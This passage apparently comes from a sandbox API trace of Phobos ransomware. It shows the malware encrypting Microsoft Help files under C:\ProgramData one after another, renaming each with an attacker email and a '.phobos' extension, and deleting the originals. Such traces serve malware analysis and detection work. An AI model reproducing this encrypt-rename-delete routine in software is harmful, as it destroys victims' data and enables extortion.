dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.280] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=314) returned 1 [0178.280] CloseHandle (hObject=0x140) returned 1 [0178.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn")) returned 0x2022 [0178.280] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.281] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.281] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.281] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.281] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.281] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.281] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.281] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x13a, lpOverlapped=0x0) returned 1 [0178.282] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x140, dwBufLen=0x140 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x140) returned 1 [0178.282] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x140, lpOverlapped=0x0) returned 1 [0178.283] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.283] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.283] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.283] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.283] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.283] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.283] CloseHandle (hObject=0x140) returned 1 [0178.283] CloseHandle (hObject=0x180) returned 1 [0178.283] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OIS.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.ois.14.1033.hxn")) returned 1 [0178.284] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.284] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.284] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=338) returned 1 [0178.284] CloseHandle (hObject=0x180) returned 1 [0178.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn")) returned 0x2022 [0178.284] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.284] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.285] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.285] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.285] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.285] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.285] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.285] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x152, lpOverlapped=0x0) returned 1 [0178.286] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.286] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.286] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.286] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.287] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.287] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.287] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.287] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.287] CloseHandle (hObject=0x180) returned 1 [0178.287] CloseHandle (hObject=0x140) returned 1 [0178.287] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.ONENOTE.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.onenote.14.1033.hxn")) returned 1 [0178.288] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.288] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=338) returned 1 [0178.288] CloseHandle (hObject=0x140) returned 1 [0178.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn")) returned 0x2022 [0178.288] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.288] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.288] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.288] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.289] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.289] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.289] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x152, lpOverlapped=0x0) returned 1 [0178.289] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.290] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.290] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.290] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.290] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.290] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.290] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.291] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.291] CloseHandle (hObject=0x140) returned 1 [0178.291] CloseHandle (hObject=0x180) returned 1 [0178.291] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.14.1033.hxn")) returned 1 [0178.292] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.292] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.292] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=362) returned 1 [0178.292] CloseHandle (hObject=0x180) returned 1 [0178.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn")) returned 0x2022 [0178.292] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.292] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.292] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.292] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.292] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.292] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.292] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.293] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x16a, lpOverlapped=0x0) returned 1 [0178.293] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x170, dwBufLen=0x170 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x170) returned 1 [0178.293] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x170, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x170, lpOverlapped=0x0) returned 1 [0178.294] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.294] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.294] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60, dwBufLen=0x60 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x60) returned 1 [0178.294] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.294] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x112, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x112, lpOverlapped=0x0) returned 1 [0178.295] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.295] CloseHandle (hObject=0x180) returned 1 [0178.295] CloseHandle (hObject=0x140) returned 1 [0178.295] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.OUTLOOK.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.outlook.dev.14.1033.hxn")) returned 1 [0178.296] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.296] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.296] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=344) returned 1 [0178.296] CloseHandle (hObject=0x140) returned 1 [0178.296] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn")) returned 0x2022 [0178.296] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.296] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.296] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.296] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.296] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.297] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.297] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.297] ReadFile (in: hFile=0x140, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x158, lpOverlapped=0x0) returned 1 [0178.302] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160, dwBufLen=0x160 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x160) returned 1 [0178.302] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x160, lpOverlapped=0x0) returned 1 [0178.303] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.303] CryptSetKeyParam (hKey=0xa32ae8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.303] CryptEncrypt (in: hKey=0xa32ae8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50, dwBufLen=0x50 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x50) returned 1 [0178.303] CryptDestroyKey (hKey=0xa32ae8) returned 1 [0178.303] WriteFile (in: hFile=0x180, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x102, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x102, lpOverlapped=0x0) returned 1 [0178.303] CryptDestroyKey (hKey=0xa32de8) returned 1 [0178.303] CloseHandle (hObject=0x140) returned 1 [0178.303] CloseHandle (hObject=0x180) returned 1 [0178.303] DeleteFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.14.1033.hxn")) returned 1 [0178.318] CryptGenRandom (in: hProv=0xa24cf8, dwLen=0x10, pbBuffer=0x2e0f9b0 | out: pbBuffer=0x2e0f9b0) returned 1 [0178.318] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.318] GetFileSizeEx (in: hFile=0x180, lpFileSize=0x2e0f950 | out: lpFileSize=0x2e0f950*=368) returned 1 [0178.318] CloseHandle (hObject=0x180) returned 1 [0178.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn")) returned 0x2022 [0178.318] GetFileAttributesW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos")) returned 0xffffffff [0178.318] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x180 [0178.318] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.319] SetFilePointerEx (in: hFile=0x180, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2e0f8f0 | out: lpNewFilePointer=0x0) returned 1 [0178.319] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft Help\\MS.POWERPNT.DEV.14.1033.hxn.id[9C354B42-0001].[tedmundboardus@aol.com].phobos" (normalized: "c:\\programdata\\microsoft help\\ms.powerpnt.dev.14.1033.hxn.id[9c354b42-0001].[tedmundboardus@aol.com].phobos"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x140 [0178.320] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f8a8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f904 | out: phKey=0x2e0f904*=0xa32de8) returned 1 [0178.320] CryptSetKeyParam (hKey=0xa32de8, dwParam=0x1, pbData=0x2e0f9b0, dwFlags=0x0) returned 1 [0178.320] ReadFile (in: hFile=0x180, lpBuffer=0x3070020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x2e0f92c, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesRead=0x2e0f92c*=0x170, lpOverlapped=0x0) returned 1 [0178.321] CryptEncrypt (in: hKey=0xa32de8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x180, dwBufLen=0x180 | out: pbData=0x3070020*, pdwDataLen=0x2e0f8c8*=0x180) returned 1 [0178.321] WriteFile (in: hFile=0x140, lpBuffer=0x3070020*, nNumberOfBytesToWrite=0x180, lpNumberOfBytesWritten=0x2e0f910, lpOverlapped=0x0 | out: lpBuffer=0x3070020*, lpNumberOfBytesWritten=0x2e0f910*=0x180, lpOverlapped=0x0) returned 1 [0178.322] CryptImportKey (in: hProv=0xa24cf8, pbData=0x2e0f89c, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x2e0f908 | out: phKey=0x2e0f908*=0xa32ae8) returned 1 [0178.322] CryptSetKeyParam 